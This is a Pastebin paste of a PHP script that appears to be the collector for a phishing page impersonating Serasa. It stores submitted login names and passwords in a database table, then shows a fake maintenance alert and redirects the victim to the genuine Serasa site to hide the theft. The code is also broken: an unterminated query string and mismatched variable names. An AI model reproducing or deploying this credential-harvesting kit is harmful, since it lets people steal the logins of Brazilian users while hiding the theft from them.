Advertisement
Guest User

Untitled

a guest
Mar 4th, 2015
229
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.78 KB | None | 0 0
  1. <?php
  2. session_start();
  3.  
  4. include 'conexao.php';
  5.  
  6.  
  7. $id = $_POST['id'];
  8. $inputLogin = $_POST['LOGON'];
  9. $senha = $_POST['SENHA'];
  10.  
  11. $conexao = obter_conexao_php_mysql();
  12.  
  13. mysql_query("INSERT INTO tbl_serasa (inputLogin,senha) VALUES ('$LOGON','$SENHA');
  14.  
  15. fechar_conexao_php_mysql($conexao);
  16.  
  17. ?>
  18.  
  19. <!DOCTYPE html>
  20. <html lang="pt-br">
  21. <head>
  22. <meta charset="iso-8859-1">
  23. <title></title>
  24. <script src="//ajax.googleapis.com/ajax/libs/jquery/1.11.1/jquery.min.js"></script>
  25. <script type="text/javascript">
  26. $(document).ready(function(){
  27. alert('Nosso sistema encontra-se em manutenção, tente novamente mais tarde.');
  28. window.parent.location = 'http://www.serasa.com.br/';
  29. });
  30. </script>
  31. </head>
  32. <body>
  33.  
  34.  
  35. </body>
  36. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement